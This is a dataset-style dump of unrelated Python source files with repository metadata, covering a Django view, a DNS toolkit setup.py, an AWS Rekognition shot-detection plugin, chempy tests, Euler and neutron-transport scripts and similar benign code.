flag = True
break
if flag:
tmp['foodDescription'] = calorieAmount
result.append(tmp)
return result
def chooseFood(request, user_login, foodName, foodDescription):
UserHistory.objects.create(userId=User.objects.get(login=user_login), foodName=foodName, foodDescription=foodDescription)
return HttpResponseRedirect(reverse('lk:index', args=(user_login,)))
| 35.675926
| 125
| 0.659227
| 426
| 3,853
| 5.819249
| 0.267606
| 0.119806
| 0.090359
| 0.07261
| 0.376361
| 0.318677
| 0.275111
| 0.260186
| 0.217426
| 0.161355
| 0
| 0.007631
| 0.217752
| 3,853
| 107
| 126
| 36.009346
| 0.814864
| 0.102777
| 0
| 0.194444
| 0
| 0
| 0.127974
| 0.01538
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097222
| false
| 0.027778
| 0.125
| 0
| 0.347222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e2d53249be23d06d560e65260043ec473bab942
| 1,159
|
py
|
Python
|
setup.py
|
CZ-NIC/deckard
|
35ed3c59b27c52fc2e3a187679251353f5efe6c0
|
[
"BSD-2-Clause"
] | 30
|
2016-08-06T20:56:17.000Z
|
2021-12-13T07:56:23.000Z
|
setup.py
|
CZ-NIC/deckard
|
35ed3c59b27c52fc2e3a187679251353f5efe6c0
|
[
"BSD-2-Clause"
] | 6
|
2016-05-31T10:48:51.000Z
|
2018-07-03T09:05:12.000Z
|
setup.py
|
CZ-NIC/deckard
|
35ed3c59b27c52fc2e3a187679251353f5efe6c0
|
[
"BSD-2-Clause"
] | 10
|
2016-04-03T13:55:19.000Z
|
2020-11-28T01:23:49.000Z
|
#!/usr/bin/env python3
from distutils.core import setup
version = '3.0'
setup(
name='deckard',
version=version,
description='DNS toolkit',
long_description=(
"Deckard is a DNS software testing based on library pydnstest."
"It supports parsing and running Unbound-like test scenarios,"
"and setting up a mock DNS server. It's based on dnspython."),
author='CZ.NIC',
author_email='knot-dns-users@lists.nic.cz',
license='BSD',
url='https://gitlab.labs.nic.cz/knot/deckard',
packages=['pydnstest'],
python_requires='>=3.5',
install_requires=[
'dnspython>=1.15',
'jinja2',
'PyYAML',
'python-augeas'
],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3 :: Only'
'Operating System :: POSIX :: Linux',
'Topic :: Internet :: Name Service (DNS)',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Software Development :: Testing',
]
)
| 31.324324
| 71
| 0.609146
| 127
| 1,159
| 5.527559
| 0.669291
| 0.055556
| 0.102564
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011521
| 0.251079
| 1,159
| 36
| 72
| 32.194444
| 0.797235
| 0.018119
| 0
| 0
| 0
| 0
| 0.583993
| 0.023747
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.030303
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e301c912b42abb46c781523b9340a9c6ccd01d4
| 13,317
|
py
|
Python
|
source/mre-plugin-samples/Plugins/DetectShotsByRekognitionVideo/DetectShotsByRekognitionVideo.py
|
aws-samples/aws-media-replay-engine-samples
|
d9b479f3c7da87c8b6d2a265334a6d3aae58d885
|
[
"MIT-0"
] | 4
|
2022-02-03T17:23:19.000Z
|
2022-03-16T13:13:09.000Z
|
source/mre-plugin-samples/Plugins/DetectShotsByRekognitionVideo/DetectShotsByRekognitionVideo.py
|
aws-samples/aws-media-replay-engine-samples
|
d9b479f3c7da87c8b6d2a265334a6d3aae58d885
|
[
"MIT-0"
] | 1
|
2022-02-22T01:25:57.000Z
|
2022-03-10T21:27:31.000Z
|
source/mre-plugin-samples/Plugins/DetectShotsByRekognitionVideo/DetectShotsByRekognitionVideo.py
|
aws-samples/aws-media-replay-engine-samples
|
d9b479f3c7da87c8b6d2a265334a6d3aae58d885
|
[
"MIT-0"
] | 1
|
2022-02-16T02:23:43.000Z
|
2022-02-16T02:23:43.000Z
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import boto3
import json
import sys
import time
import ffmpeg
from MediaReplayEnginePluginHelper import OutputHelper
from MediaReplayEnginePluginHelper import Status
from MediaReplayEnginePluginHelper import DataPlane
s3_client = boto3.client('s3')
class VideoDetect:
jobId = ''
rek = boto3.client('rekognition')
sqs = boto3.client('sqs')
sns = boto3.client('sns')
roleArn = ''
bucket = ''
video = ''
startJobId = ''
sqsQueueUrl = ''
snsTopicArn = ''
processType = ''
def __init__(self, role, bucket, video):
self.roleArn = role
self.bucket = bucket
self.video = video
def GetSQSMessageSuccess(self):
jobFound = False
succeeded = False
dotLine=0
while jobFound == False:
sqsResponse = self.sqs.receive_message(QueueUrl=self.sqsQueueUrl, MessageAttributeNames=['ALL'],
MaxNumberOfMessages=10)
###print(sqsResponse)
if sqsResponse:
if 'Messages' not in sqsResponse:
if dotLine<100:
print('.', end='')
dotLine=dotLine+1
else:
print()
dotLine=0
####kyle
print('TIMEOUT')
break
sys.stdout.flush()
time.sleep(5)
continue
for message in sqsResponse['Messages']:
notification = json.loads(message['Body'])
rekMessage = json.loads(notification['Message'])
print(rekMessage['JobId'])
print(rekMessage['Status'])
if rekMessage['JobId'] == self.startJobId:
print('Matching Job Found:' + rekMessage['JobId'])
jobFound = True
if (rekMessage['Status']=='SUCCEEDED'):
succeeded=True
self.sqs.delete_message(QueueUrl=self.sqsQueueUrl,
ReceiptHandle=message['ReceiptHandle'])
else:
print("Job didn't match:" +
str(rekMessage['JobId']) + ' : ' + self.startJobId)
# Delete the unknown message. Consider sending to dead letter queue
self.sqs.delete_message(QueueUrl=self.sqsQueueUrl,
ReceiptHandle=message['ReceiptHandle'])
return succeeded
def CreateTopicandQueue(self):
millis = str(int(round(time.time() * 1000)))
#Create SNS topic
snsTopicName="AmazonRekognitionExample" + millis
topicResponse=self.sns.create_topic(Name=snsTopicName)
self.snsTopicArn = topicResponse['TopicArn']
print('SNS created',snsTopicName)
#create SQS queue
sqsQueueName="AmazonRekognitionQueue" + millis
self.sqs.create_queue(QueueName=sqsQueueName)
self.sqsQueueUrl = self.sqs.get_queue_url(QueueName=sqsQueueName)['QueueUrl']
attribs = self.sqs.get_queue_attributes(QueueUrl=self.sqsQueueUrl,
AttributeNames=['QueueArn'])['Attributes']
sqsQueueArn = attribs['QueueArn']
print('SQS created',sqsQueueName)
# Subscribe SQS queue to SNS topic
self.sns.subscribe(
TopicArn=self.snsTopicArn,
Protocol='sqs',
Endpoint=sqsQueueArn)
#Authorize SNS to write SQS queue
policy = """{{
"Version":"2012-10-17",
"Statement":[
{{
"Sid":"MyPolicy",
"Effect":"Allow",
"Principal" : {{"AWS" : "*"}},
"Action":"SQS:SendMessage",
"Resource": "{}",
"Condition":{{
"ArnEquals":{{
"aws:SourceArn": "{}"
}}
}}
}}
]
}}""".format(sqsQueueArn, self.snsTopicArn)
response = self.sqs.set_queue_attributes(
QueueUrl = self.sqsQueueUrl,
Attributes = {
'Policy' : policy
})
def DeleteTopicandQueue(self):
self.sqs.delete_queue(QueueUrl=self.sqsQueueUrl)
self.sns.delete_topic(TopicArn=self.snsTopicArn)
def StartSegmentDetection(self, use_sns=False):
min_Technical_Cue_Confidence = 80.0
min_Shot_Confidence = 60.0
max_pixel_threshold = 0.1
min_coverage_percentage = 60
if use_sns:
response = self.rek.start_segment_detection(
Video={"S3Object": {"Bucket": self.bucket, "Name": self.video}},
NotificationChannel={
"RoleArn": self.roleArn,
"SNSTopicArn": self.snsTopicArn,
},
SegmentTypes=["TECHNICAL_CUE", "SHOT"],
Filters={
"TechnicalCueFilter": {
"MinSegmentConfidence": min_Technical_Cue_Confidence,
# "BlackFrame": {
# "MaxPixelThreshold": max_pixel_threshold,
# "MinCoveragePercentage": min_coverage_percentage,
# },
},
"ShotFilter": {"MinSegmentConfidence": min_Shot_Confidence},
}
)
else:
response = self.rek.start_segment_detection(
Video={"S3Object": {"Bucket": self.bucket, "Name": self.video}},
SegmentTypes=["TECHNICAL_CUE", "SHOT"],
Filters={
"TechnicalCueFilter": {
"MinSegmentConfidence": min_Technical_Cue_Confidence,
# "BlackFrame": {
# "MaxPixelThreshold": max_pixel_threshold,
# "MinCoveragePercentage": min_coverage_percentage,
# },
},
"ShotFilter": {"MinSegmentConfidence": min_Shot_Confidence},
}
)
self.startJobId = response["JobId"]
print(f"Start Job Id: {self.startJobId}")
def GetSegmentDetectionResults(self, chunk_start):
maxResults = 10
paginationToken = ""
finished = False
firstTime = True
outlist = []
while finished == False:
response = self.rek.get_segment_detection(
JobId=self.startJobId, MaxResults=maxResults, NextToken=paginationToken
)
#print(response)
if response['JobStatus'] == 'IN_PROGRESS':
print('waiting 10s')
time.sleep(10)
continue
if firstTime == True:
print(f"Status\n------\n{response['JobStatus']}")
print("\nRequested Types\n---------------")
for selectedSegmentType in response['SelectedSegmentTypes']:
print(f"\tType: {selectedSegmentType['Type']}")
print(f"\t\tModel Version: {selectedSegmentType['ModelVersion']}")
print()
print("\nAudio metadata\n--------------")
for audioMetadata in response['AudioMetadata']:
print(f"\tCodec: {audioMetadata['Codec']}")
print(f"\tDuration: {audioMetadata['DurationMillis']}")
print(f"\tNumber of Channels: {audioMetadata['NumberOfChannels']}")
print(f"\tSample rate: {audioMetadata['SampleRate']}")
print()
print("\nVideo metadata\n--------------")
for videoMetadata in response["VideoMetadata"]:
print(videoMetadata)
print(f"\tCodec: {videoMetadata['Codec']}")
#print(f"\tColor Range: {videoMetadata['ColorRange']}")
print(f"\tDuration: {videoMetadata['DurationMillis']}")
print(f"\tFormat: {videoMetadata['Format']}")
print(f"\tFrame rate: {videoMetadata['FrameRate']}")
print("\nSegments\n--------")
firstTime = False
for segment in response['Segments']:
if segment["Type"] == "TECHNICAL_CUE":
print("Technical Cue")
print(f"\tConfidence: {segment['TechnicalCueSegment']['Confidence']}")
print(f"\tType: {segment['TechnicalCueSegment']['Type']}")
if segment["Type"] == "SHOT":
print("Shot")
print(f"\tConfidence: {segment['ShotSegment']['Confidence']}")
print(f"\tIndex: " + str(segment["ShotSegment"]["Index"]))
outputSeg = {}
outputSeg['Label'] = 'SHOT'
outputSeg['beg'] = segment['StartTimecodeSMPTE']
outputSeg['end'] = segment['EndTimecodeSMPTE']
outputSeg['duration'] = segment['DurationSMPTE']
outlist.append(outputSeg)
print(f"\tDuration (milliseconds): {segment['DurationMillis']}")
print(f"\tStart Timestamp (milliseconds): {segment['StartTimestampMillis']}")
print(f"\tEnd Timestamp (milliseconds): {segment['EndTimestampMillis']}")
print(f"\tStart timecode: {segment['StartTimecodeSMPTE']}")
print(f"\tEnd timecode: {segment['EndTimecodeSMPTE']}")
print(f"\tDuration timecode: {segment['DurationSMPTE']}")
print(f"\tStart frame number {segment['StartFrameNumber']}")
print(f"\tEnd frame number: {segment['EndFrameNumber']}")
print(f"\tDuration frames: {segment['DurationFrames']}")
print()
if "NextToken" in response:
paginationToken = response["NextToken"]
else:
finished = True
times_sec = []
begs_sec = []
results = []
for out in outlist:
time_str = out['duration']
hh,mm,ss,ms = map(int,time_str.replace(';',':').split(':'))
time_sec = float("{:.2f}".format(ms/60 + ss + 60*(mm + 60*hh)))
print(time_str,time_sec)
times_sec.append(time_sec)
beg_str = out['beg']
hh,mm,ss,ms = map(int,beg_str.replace(';',':').split(':'))
beg_sec = float("{:.2f}".format(ms/60 + ss + 60*(mm + 60*hh))) + chunk_start
print(beg_str,beg_sec)
begs_sec.append(beg_sec)
results.append({'Label':'SHOT','Start':beg_sec,'Duration':time_sec})
return results
def lambda_handler(event, context):
results = []
mre_dataplane = DataPlane(event)
# 'event' is the input event payload passed to Lambda
mre_outputhelper = OutputHelper(event)
# Replace following with the ARN of the AmazonRekognitionServiceRole
roleArn = 'arn:aws:iam::ACCOUNTNUMBER:role/AmazonRekognitionServiceRole'
bucket = event['Input']['Media']["S3Bucket"]
video = event['Input']['Media']["S3Key"] #"***.ts"
chunk_start = event['Input']['Metadata']['HLSSegment']['StartTime']
try:
# Download the HLS video segment from S3
media_path = mre_dataplane.download_media()
mp4_path = '/tmp/mre_chunk.mp4'
try:
stream = ffmpeg.input(media_path)
out, err = (
ffmpeg.output(stream,mp4_path)
.run(capture_stdout=True, capture_stderr=True,overwrite_output=True)
)
except ffmpeg.Error as err:
print(err.stderr)
raise
try:
video_mp4 = video[:-2]+'mp4'
response = s3_client.upload_file(mp4_path, bucket, video_mp4)
except ClientError as e:
logging.error(e)
return False
print(f'{media_path} converted to {mp4_path} and uploaded to {video_mp4}')
analyzer=VideoDetect(roleArn, bucket,video_mp4)
analyzer.StartSegmentDetection()
results = analyzer.GetSegmentDetectionResults(chunk_start)
print(f'results:{results}')
# Add the results of the plugin to the payload (required if the plugin status is "complete"; Optional if the plugin has any errors)
mre_outputhelper.add_results_to_output(results)
# Persist plugin results for later use
mre_dataplane.save_plugin_results(results)
# Update the processing status of the plugin (required)
mre_outputhelper.update_plugin_status(Status.PLUGIN_COMPLETE)
# Returns expected payload built by MRE helper library
return mre_outputhelper.get_output_object()
except Exception as e:
print(e)
# Update the processing status of the plugin (required)
mre_outputhelper.update_plugin_status(Status.PLUGIN_ERROR)
# Re-raise the exception to MRE processing where it will be handled
raise
| 39.283186
| 139
| 0.535181
| 1,139
| 13,317
| 6.152766
| 0.296752
| 0.023973
| 0.019692
| 0.012842
| 0.158676
| 0.147831
| 0.143836
| 0.143836
| 0.143836
| 0.143836
| 0
| 0.008759
| 0.348427
| 13,317
| 338
| 140
| 39.399408
| 0.798894
| 0.086431
| 0
| 0.15444
| 0
| 0
| 0.21319
| 0.077988
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.030888
| 0
| 0.119691
| 0.196911
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e316afea9883b374b2578dfd94ecad511320c5f
| 1,567
|
py
|
Python
|
chempy/kinetics/tests/test_integrated.py
|
matecsaj/chempy
|
2c93f185e4547739331193c06d77282206621517
|
[
"BSD-2-Clause"
] | null | null | null |
chempy/kinetics/tests/test_integrated.py
|
matecsaj/chempy
|
2c93f185e4547739331193c06d77282206621517
|
[
"BSD-2-Clause"
] | null | null | null |
chempy/kinetics/tests/test_integrated.py
|
matecsaj/chempy
|
2c93f185e4547739331193c06d77282206621517
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import division
from chempy.util.testing import requires
from ..integrated import pseudo_irrev, pseudo_rev, binary_irrev, binary_rev
import pytest
try:
import sympy
except ImportError:
sympy = None
else:
one = sympy.S(1)
t, kf, kb, prod, major, minor = sympy.symbols(
't kf kb prod major minor', negative=False, nonnegative=True, real=True)
subsd = {t: one*2, kf: one*3, kb: one*7, major: one*11,
minor: one*13, prod: one*0}
@requires('sympy')
def test_pseudo_irrev():
f = pseudo_irrev(t, kf, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
assert (num_dfdt - (
major*kf*(minor - f)
).subs(subsd)).simplify() == 0
@requires('sympy')
def test_pseudo_rev():
f = pseudo_rev(t, kf, kb, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
assert (num_dfdt - (major*kf*(minor - f) - kb*f).subs(subsd)).simplify() == 0
@pytest.mark.slow
@requires('sympy')
def test_binary_irrev():
f = binary_irrev(t, kf, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
assert (num_dfdt - (kf*(minor - f)*(major - f)).subs(subsd)).simplify() == 0
@pytest.mark.slow
@requires('sympy')
def test_binary_rev():
f = binary_rev(t, kf, kb, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
ans = kf*(minor - f)*(major - f) - kb*f
# symbolic susbsitution fails:
assert abs(float(num_dfdt) - float(ans.subs(subsd))) < 2e-14
| 27.017241
| 81
| 0.640715
| 240
| 1,567
| 4.066667
| 0.258333
| 0.057377
| 0.086066
| 0.036885
| 0.589139
| 0.544057
| 0.449795
| 0.449795
| 0.449795
| 0.449795
| 0
| 0.012019
| 0.203574
| 1,567
| 57
| 82
| 27.491228
| 0.770032
| 0.017869
| 0
| 0.325581
| 0
| 0
| 0.028627
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 1
| 0.093023
| false
| 0
| 0.139535
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e36f2c784f6f44bd775bdedd2272a8be3601516
| 525
|
py
|
Python
|
src/response.py
|
vcokltfre/snowflake.vcokltf.re
|
5b8324a4fbc2e512dbc263d4ed65edb89d72a549
|
[
"MIT"
] | 1
|
2021-03-23T15:13:04.000Z
|
2021-03-23T15:13:04.000Z
|
src/response.py
|
vcokltfre/snowflake.vcokltf.re
|
5b8324a4fbc2e512dbc263d4ed65edb89d72a549
|
[
"MIT"
] | null | null | null |
src/response.py
|
vcokltfre/snowflake.vcokltf.re
|
5b8324a4fbc2e512dbc263d4ed65edb89d72a549
|
[
"MIT"
] | null | null | null |
from starlette.responses import HTMLResponse
class ResponseBuilder:
def __init__(self):
self.items = []
def addtag(self, name: str, value: str):
self.items.append((name, value))
def build(self):
og_tags = ""
for item in self.items:
og_tags += f"\n<meta property=\"og:{item[0]}\" content=\"{item[1]}\">"
return HTMLResponse(f"""
<html>
<head>
{og_tags}
</head>
</html>
""")
| 23.863636
| 82
| 0.485714
| 55
| 525
| 4.509091
| 0.581818
| 0.108871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006024
| 0.367619
| 525
| 21
| 83
| 25
| 0.740964
| 0
| 0
| 0
| 0
| 0
| 0.293333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3a0239409f0db941b17e1b31a07a8a3ed673cb
| 694
|
py
|
Python
|
lectures/extensions/hyperbolic_discounting/replication_code/.mywaflib/waflib/Tools/clang.py
|
loikein/ekw-lectures
|
a2f5436f10515ab26eab323fca8c37c91bdc5dcd
|
[
"MIT"
] | 4
|
2019-11-15T15:21:27.000Z
|
2020-07-08T15:04:30.000Z
|
lectures/extensions/hyperbolic_discounting/replication_code/.mywaflib/waflib/Tools/clang.py
|
loikein/ekw-lectures
|
a2f5436f10515ab26eab323fca8c37c91bdc5dcd
|
[
"MIT"
] | 9
|
2019-11-18T15:54:36.000Z
|
2020-07-14T13:56:53.000Z
|
lectures/extensions/hyperbolic_discounting/replication_code/.mywaflib/waflib/Tools/clang.py
|
loikein/ekw-lectures
|
a2f5436f10515ab26eab323fca8c37c91bdc5dcd
|
[
"MIT"
] | 3
|
2021-01-25T15:41:30.000Z
|
2021-09-21T08:51:36.000Z
|
#!/usr/bin/env python
# Krzysztof Kosiński 2014
"""
Detect the Clang C compiler
"""
from waflib.Configure import conf
from waflib.Tools import ar
from waflib.Tools import ccroot
from waflib.Tools import gcc
@conf
def find_clang(conf):
"""
Finds the program clang and executes it to ensure it really is clang
"""
cc = conf.find_program("clang", var="CC")
conf.get_cc_version(cc, clang=True)
conf.env.CC_NAME = "clang"
def configure(conf):
conf.find_clang()
conf.find_program(["llvm-ar", "ar"], var="AR")
conf.find_ar()
conf.gcc_common_flags()
conf.gcc_modifier_platform()
conf.cc_load_tools()
conf.cc_add_flags()
conf.link_add_flags()
| 22.387097
| 72
| 0.693084
| 106
| 694
| 4.367925
| 0.433962
| 0.086393
| 0.097192
| 0.136069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007067
| 0.184438
| 694
| 30
| 73
| 23.133333
| 0.810954
| 0.20317
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.222222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3b5a48a7befde960b0ddd0c42b6f209d9a2b77
| 457
|
py
|
Python
|
test_lambda_function.py
|
gavinbull/loyalty_anagram
|
a91d23083d8c040916733751932fb47d00592890
|
[
"MIT"
] | null | null | null |
test_lambda_function.py
|
gavinbull/loyalty_anagram
|
a91d23083d8c040916733751932fb47d00592890
|
[
"MIT"
] | null | null | null |
test_lambda_function.py
|
gavinbull/loyalty_anagram
|
a91d23083d8c040916733751932fb47d00592890
|
[
"MIT"
] | null | null | null |
import unittest
from lambda_function import gather_anagrams
class TestSum(unittest.TestCase):
def test_list_int(self):
"""
Basic unit test to verify anagram of cinema including upper+lower case
"""
test_word = "iceman"
get_result = gather_anagrams(test_word)
expected = ['anemic', 'cinema', 'iceman']
self.assertEqual(get_result, expected)
if __name__ == '__main__':
unittest.main()
| 28.5625
| 86
| 0.654267
| 52
| 457
| 5.423077
| 0.692308
| 0.099291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.251641
| 457
| 15
| 87
| 30.466667
| 0.824561
| 0.153173
| 0
| 0
| 0
| 0
| 0.090141
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3d9a4ab5c166e9fe2b7e4de49e51e3488a6de5
| 577
|
py
|
Python
|
euler62.py
|
dchourasia/euler-solutions
|
e20cbf016a9ea601fcce928d9690930c9a498837
|
[
"Apache-2.0"
] | null | null | null |
euler62.py
|
dchourasia/euler-solutions
|
e20cbf016a9ea601fcce928d9690930c9a498837
|
[
"Apache-2.0"
] | null | null | null |
euler62.py
|
dchourasia/euler-solutions
|
e20cbf016a9ea601fcce928d9690930c9a498837
|
[
"Apache-2.0"
] | null | null | null |
'''
Find the smallest cube for which exactly five permutations of its digits are cube.
'''
import math, itertools
print(math.pow(8, 1/3).is_integer())
tried = {}
for i in range(1000, 1200):
cb = int(math.pow(i, 3))
#print(cb)
#print(math.pow(int(cb), 1/3))
roots = 1
tried[i] = [str(cb)]
for x in itertools.permutations(str(cb)):
x = ''.join(x)
if x not in tried[i]:
#print('x =', x)
y = round(math.pow(int(x), 1/3))
#print(y**3, x)
if y**3 == int(x):
roots += 1
tried[i].append(x)
print(roots, i, y, x)
if roots == 5:
print(cb)
break
| 21.37037
| 82
| 0.587522
| 106
| 577
| 3.188679
| 0.396226
| 0.08284
| 0.071006
| 0.071006
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046256
| 0.213172
| 577
| 27
| 83
| 21.37037
| 0.698238
| 0.259965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3eca14631d828c95eda787a3d066e5994ecfdb
| 3,010
|
py
|
Python
|
examples/reeds_problem.py
|
bwhewe-13/ants
|
6923cfc1603e0cd90c2ae90fa0fed6dd86edc0b2
|
[
"MIT"
] | null | null | null |
examples/reeds_problem.py
|
bwhewe-13/ants
|
6923cfc1603e0cd90c2ae90fa0fed6dd86edc0b2
|
[
"MIT"
] | null | null | null |
examples/reeds_problem.py
|
bwhewe-13/ants
|
6923cfc1603e0cd90c2ae90fa0fed6dd86edc0b2
|
[
"MIT"
] | null | null | null |
from ants.medium import MediumX
from ants.materials import Materials
from ants.mapper import Mapper
from ants.multi_group import source_iteration
import numpy as np
import matplotlib.pyplot as plt
def reeds(cells):
width = 16.
delta_x = width/cells
group = 1
boundaries = [slice(0,int(2/delta_x)),slice(int(2/delta_x),int(3/delta_x)),
slice(int(3/delta_x),int(5/delta_x)),slice(int(5/delta_x),int(6/delta_x)),
slice(int(6/delta_x),int(10/delta_x)),slice(int(10/delta_x),int(11/delta_x)),
slice(int(11/delta_x),int(13/delta_x)),slice(int(13/delta_x),int(14/delta_x)),
slice(int(14/delta_x),int(16/delta_x))]
total_xs = np.zeros((cells,group),dtype='float64')
total_vals = [10,10,0,5,50,5,0,10,10]
# total_vals = [1,1,0,5,50,5,0,1,1]
scatter_xs = np.zeros((cells,group,group),dtype='float64')
scatter_vals = [9.9,9.9,0,0,0,0,0,9.9,9.9]
# scatter_vals = [0.9,0.9,0,0,0,0,0,0.9,0.9]
source = np.zeros((cells,group),dtype='float64')
source_vals = [0,1,0,0,50,0,0,1,0]
for ii in range(len(boundaries)):
total_xs[boundaries[ii]] = total_vals[ii]
scatter_xs[boundaries[ii]] = np.diag(np.repeat(scatter_vals[ii],group))
source[boundaries[ii]] = source_vals[ii]
# scatter_xs = np.ones((cells,group,group),dtype='float64') * 0.1
return total_xs, scatter_xs, source
groups = 1
cells_x = 1000
medium_width = 16.
cell_width_x = medium_width / cells_x
angles = 16
xbounds = np.array([1, 0])
materials = ['reed-vacuum', 'reed-strong-source', \
'reed-scatter','reed-absorber']
problem_01 = Materials(materials, 1, None)
medium = MediumX(cells_x, cell_width_x, angles, xbounds)
medium.add_external_source("reed")
map_obj = Mapper.load_map('reed_problem2.mpr')
if cells_x != map_obj.cells_x:
map_obj.adjust_widths(cells_x)
reversed_key = {v: k for k, v in map_obj.map_key.items()}
total = []
scatter = []
fission = []
for position in range(len(map_obj.map_key)):
map_material = reversed_key[position]
total.append(problem_01.data[map_material][0])
scatter.append(problem_01.data[map_material][1])
fission.append(problem_01.data[map_material][2])
total = np.array(total)
scatter = np.array(scatter)
fission = np.array(fission)
print(map_obj.map_key.keys())
print(problem_01.data.keys())
mu_x = medium.mu_x
weight = medium.weight
print(mu_x)
print(weight)
medium_map = map_obj.map_x.astype(int)
phi = source_iteration(groups, mu_x / cell_width_x, weight, total, scatter, \
fission, medium.ex_source, medium_map, xbounds, \
cell_width_x)
print(medium.ex_source.shape)
fig, ax = plt.subplots()
solution = np.load('reed_solution.npy')
print(len(solution))
print(np.allclose(solution, phi[:,0],atol=1e-12))
ax.plot(np.linspace(0, 16, len(solution)), solution, label='solution', c='k', ls='--')
ax.plot(np.linspace(0, medium_width, cells_x), phi[:,0], label='New', c='r', alpha=0.6)
ax.legend(loc=0)
plt.show()
| 29.80198
| 87
| 0.679734
| 514
| 3,010
| 3.805447
| 0.225681
| 0.055215
| 0.04499
| 0.05726
| 0.140082
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0.054033
| 0.151495
| 3,010
| 101
| 88
| 29.80198
| 0.711825
| 0.046512
| 0
| 0
| 0
| 0
| 0.044646
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0.084507
| 0
| 0.112676
| 0.098592
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e40a4a7ae6fa13448f345e341c1c32845116799
| 29,411
|
py
|
Python
|
exp_runner.py
|
BoifZ/NeuS
|
a2900fa5c0b2a9d54b9cb5b364440ee7eecfb525
|
[
"MIT"
] | null | null | null |
exp_runner.py
|
BoifZ/NeuS
|
a2900fa5c0b2a9d54b9cb5b364440ee7eecfb525
|
[
"MIT"
] | null | null | null |
exp_runner.py
|
BoifZ/NeuS
|
a2900fa5c0b2a9d54b9cb5b364440ee7eecfb525
|
[
"MIT"
] | null | null | null |
import os
import time
import logging
import argparse
import numpy as np
import cv2 as cv
import trimesh
